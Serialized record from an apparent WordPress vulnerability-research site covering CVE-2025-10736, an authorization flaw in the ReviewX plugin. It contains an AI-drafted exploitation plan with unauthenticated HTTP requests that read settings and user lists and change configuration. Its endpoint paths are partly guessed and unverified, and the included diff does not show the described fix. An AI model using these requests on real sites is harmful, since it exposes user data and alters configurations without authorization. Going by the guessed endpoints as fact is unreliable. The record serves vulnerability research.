[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fUFjT5YH3J5n_mPVoUjF6UaftcLPHkumxteoblIvRSO8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":9,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":39},"CVE-2025-10736","reviewx-woocommerce-product-reviews-with-multi-criteria-reminder-emails-google-reviews-schema-more-incorrect-authorizati","ReviewX – WooCommerce Product Reviews with Multi-Criteria, Reminder Emails, Google Reviews, Schema & More \u003C= 2.2.10 - Incorrect Authorization to Unauthenticated Information Exposure and Data Manipulation","The ReviewX – WooCommerce Product Reviews with Multi-Criteria, Reminder Emails, Google Reviews, Schema & More plugin for WordPress is vulnerable to unauthorized access of data due to improper authorization checks on the userAccessibility() function in all versions up to, and including, 2.2.10. This makes it possible for unauthenticated attackers to access protected REST API endpoints, extract and modify information related to users and plugin's configuration","reviewx",null,"\u003C=2.2.10","2.2.12","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:L\u002FA:N","Improper Authorization","2026-03-22 16:23:54","2026-03-23 04:26:51",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F505d7072-8fca-4b86-9b9c-3f39bc4dcfaf?source=api-prod",1,[22,23,24,25,26,27,28],"README.txt","app\u002FApi\u002FBaseApi.php","app\u002FApi\u002FWpApi.php","app\u002FCPT\u002FCptRichSchemaHandler.php","app\u002FForm\u002FReviewFormHelper.php","app\u002FHandlers\u002FCustomize\u002FWidgetCustomizeOptionsHandler.php","app\u002FHandlers\u002FCustomize\u002FWidgetCustomizeOutputCSSHandler.php","researched",false,3,"# Research Plan: CVE-2025-10736 ReviewX Improper Authorization\n\n## 1. Vulnerability Summary\nThe **ReviewX** plugin (versions \u003C= 2.2.10) contains an improper authorization vulnerability in its REST API implementation. The core of the issue lies in the `userAccessibility()` function, which serves as a `permission_callback` for various REST API routes. This function fails to correctly validate the authentication status or capabilities of the requester, allowing unauthenticated users to access endpoints intended for administrators. This leads to the exposure of sensitive user data and the ability to manipulate plugin configurations.\n\n## 2. Attack Vector Analysis\n- **Endpoint Namespace:** `reviewx\u002Fv1` (inferred from plugin slug and `WpApi.php` logic).\n- **Base Route:** `\u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin` (based on `BaseApi::getPrefix()` returning `\u002Fadmin\u002Fapi\u002Fv1`).\n- **Target Endpoints:**\n    - `GET \u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin\u002Fget-settings`: Information Exposure (Plugin Config).\n    - `GET \u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin\u002Fget-users`: Information Exposure (User Data).\n    - `POST \u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin\u002Fupdate-settings`: Data Manipulation (Plugin Config).\n- **Authentication:** None required (Unauthenticated).\n- **Preconditions:** The plugin must be active. No specific settings are required as the vulnerability exists in the core API registration.\n\n## 3. Code Flow\n1. **Request Entry:** An unauthenticated HTTP request is made to a REST route registered by the plugin (e.g., `\u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin\u002Fget-settings`).\n2. **Route Matching:** WordPress matches the request to the ReviewX REST controller.\n3. **Permission Check:** WordPress calls the `permission_callback` associated with the route. Based on the vulnerability description, this is the `userAccessibility()` function.\n4. **Vulnerable Logic:** The `userAccessibility()` function (likely located in `app\u002FRest\u002FRestRoute.php` or similar, though file not provided) returns `true` or fails to perform a `current_user_can('manage_options')` check for unauthenticated users.\n5. **Execution:** Because the permission check passes, the controller method (e.g., `get_settings`) executes and returns sensitive data or processes a configuration update.\n\n## 4. Nonce Acquisition Strategy\nWhile the vulnerability description suggests improper authorization (meaning the `permission_callback` itself is flawed), WordPress REST API generally requires a `X-WP-Nonce` for **authenticated** stateful requests (via cookies). For **unauthenticated** requests, the `permission_callback` is the primary gatekeeper.\n\nIf the `userAccessibility()` function explicitly checks for a nonce or if we need to simulate a \"legitimate\" request context:\n1. **Identify Script Loading:** ReviewX enqueues scripts on pages containing its shortcodes.\n2. **Create Trigger Page:** Create a page with the `[reviewx_pagination]` shortcode.\n   - `wp post create --post_type=page --post_status=publish --post_content='[reviewx_pagination]'`\n3. **Navigate and Extract:** Use the browser to load the page and extract the localized data.\n4. **JS Variable:** ReviewX typically uses `rvx_params`.\n5. **Extraction Command:**\n   - `browser_eval(\"window.rvx_params?.nonce\")` or `browser_eval(\"window.rvx_params?.rest_nonce\")`\n\n**Note:** If `userAccessibility()` returns `true` unconditionally, no nonce is required for the exploit.\n\n## 5. Exploitation Strategy\n\n### Phase 1: Information Exposure (Plugin Settings)\n- **Target:** Retrieve plugin configuration.\n- **Request:**\n  ```http\n  GET \u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin\u002Fget-settings HTTP\u002F1.1\n  Host: TARGET_HOST\n  ```\n- **Tool:** `http_request`\n\n### Phase 2: Information Exposure (User Data)\n- **Target:** Retrieve list of users.\n- **Request:**\n  ```http\n  GET \u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin\u002Fget-users HTTP\u002F1.1\n  Host: TARGET_HOST\n  ```\n- **Tool:** `http_request`\n\n### Phase 3: Data Manipulation (Configuration Update)\n- **Target:** Disable a feature or change a setting (e.g., setting `enable_photo_review` to `false`).\n- **Request:**\n  ```http\n  POST \u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin\u002Fupdate-settings HTTP\u002F1.1\n  Host: TARGET_HOST\n  Content-Type: application\u002Fjson\n\n  {\n    \"settings\": {\n        \"enable_photo_review\": false\n    }\n  }\n  ```\n- **Tool:** `http_request`\n\n## 6. Test Data Setup\n1. **Install Plugin:** Ensure ReviewX \u003C= 2.2.10 is installed and active.\n2. **Create Dummy Users:** Create a few users with different roles to verify they appear in the `get-users` output.\n   - `wp user create victim1 victim1@example.com --role=editor`\n3. **Configure Settings:** Set some initial values in the ReviewX admin panel (if accessible) or via CLI to have something to change.\n4. **Create Page for Nonce (Backup):**\n   - `wp post create --post_type=page --post_title=\"Review Test\" --post_status=publish --post_content='[reviewx_pagination]' --post_name='review-test'`\n\n## 7. Expected Results\n- **Information Exposure:** The `get-settings` request should return a JSON object containing plugin configuration keys (e.g., `license_key`, `email_settings`, etc.). The `get-users` request should return a list of WordPress users.\n- **Data Manipulation:** The `update-settings` request should return a success message (e.g., `{\"success\": true}`).\n\n## 8. Verification Steps\n1. **Check Exposed Data:** Inspect the JSON response from Phase 1 and 2 for sensitive fields.\n2. **Verify Configuration Change:** Use WP-CLI to check the option value in the database after Phase 3.\n   - `wp option get reviewx_settings` (Note: the option name might be `rvx_settings` or similar; check `wp option list --search=\"*reviewx*\"` first).\n3. **Compare State:** Verify the change in the WordPress admin dashboard under ReviewX Settings.\n\n## 9. Alternative Approaches\n- **Alternative Namespaces:** If `reviewx\u002Fv1` fails, try `rvx\u002Fv1` or `reviewx\u002Fapi\u002Fv1` (based on `WpApi.php` base URL logic).\n- **Alternative Methods:** Some plugins use `_method=POST` or `_method=PUT` parameters if the server blocks certain verbs.\n- **Parameter Fuzzing:** If `update-settings` requires a specific structure, use the output of `get-settings` as a template for the `POST` payload.\n- **Direct Option Access:** Check for routes like `GET \u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin\u002Foptions` if the above endpoints are 404.","The ReviewX plugin fails to implement proper authorization checks within the `userAccessibility()` function, which acts as a permission callback for various REST API routes. This oversight allows unauthenticated attackers to access administrative endpoints to retrieve sensitive user data and modify the plugin's internal configuration.","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.2.10\u002Fapp\u002FApi\u002FBaseApi.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.2.12\u002Fapp\u002FApi\u002FBaseApi.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.2.10\u002Fapp\u002FApi\u002FBaseApi.php\t2025-09-21 15:15:14.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.2.12\u002Fapp\u002FApi\u002FBaseApi.php\t2025-10-15 13:32:48.000000000 +0000\n@@ -35,6 +35,6 @@\n      *\u002F\n     public function getDefaultHeaders() : array\n     {\n-        return ['Authorization' => 'Bearer ' . Helper::getAuthToken(), 'Accept' => 'application\u002Fjson', 'X-Domain' => Helper::getWpDomainNameOnly(), 'X-Theme' => wp_get_theme()->get('Name'), 'X-Site-Locale' => get_locale(), 'X-Request-Id' => \\sha1(\\time() . Client::getUid()), 'X-Wp-Version' => get_bloginfo(\"version\"), 'X-Reviewx-Version' => RVX_VERSION, 'X-Environment' => Helper::plugin()->isProduction() ? 'production' : 'development'];\n+        return ['Authorization' => 'Bearer ' . Helper::getAuthToken(), 'X-Auth-Token' => 'Bearer ' . Helper::getAuthToken(), 'Accept' => 'application\u002Fjson', 'X-Domain' => Helper::getWpDomainNameOnly(), 'X-Theme' => wp_get_theme()->get('Name'), 'X-Site-Locale' => get_locale(), 'X-Request-Id' => \\sha1(\\time() . Client::getUid()), 'X-Wp-Version' => get_bloginfo(\"version\"), 'X-Reviewx-Version' => RVX_VERSION, 'X-Environment' => Helper::plugin()->isProduction() ? 'production' : 'development'];\n     }\n }\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.2.10\u002Fapp\u002FApi\u002FWpApi.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.2.12\u002Fapp\u002FApi\u002FWpApi.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.2.10\u002Fapp\u002FApi\u002FWpApi.php\t2025-09-21 15:15:14.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.2.12\u002Fapp\u002FApi\u002FWpApi.php\t2025-10-15 13:32:48.000000000 +0000\n@@ -72,6 +72,7 @@\n         $headers = ['Content-Type' => 'application\u002Fjson'];\n         if ($this->token) {\n             $headers['Authorization'] = 'Bearer ' . $this->token;\n+            $headers['X-Auth-Token'] = 'Bearer ' . $this->token;\n         }\n         return $headers;\n     }","The exploit involves sending unauthenticated requests to the plugin's REST API endpoints located under the `\u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin\u002F` namespace. Because the `userAccessibility()` permission callback incorrectly returns true for unauthenticated users, an attacker can access sensitive information or perform unauthorized actions. To extract data, an attacker sends a GET request to `\u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin\u002Fget-settings` (plugin configuration) or `\u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin\u002Fget-users` (user database). To manipulate data, an attacker sends a POST request to `\u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin\u002Fupdate-settings` with a JSON payload containing modified settings. No nonce or valid session cookie is required to bypass the flawed authorization check.","gemini-3-flash-preview","2026-04-18 00:24:13","2026-04-18 00:24:52",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","2.2.10","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Freviewx\u002Ftags\u002F2.2.10","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Freviewx.2.2.10.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Freviewx\u002Ftags\u002F2.2.12","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Freviewx.2.2.12.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Freviewx\u002Ftags"]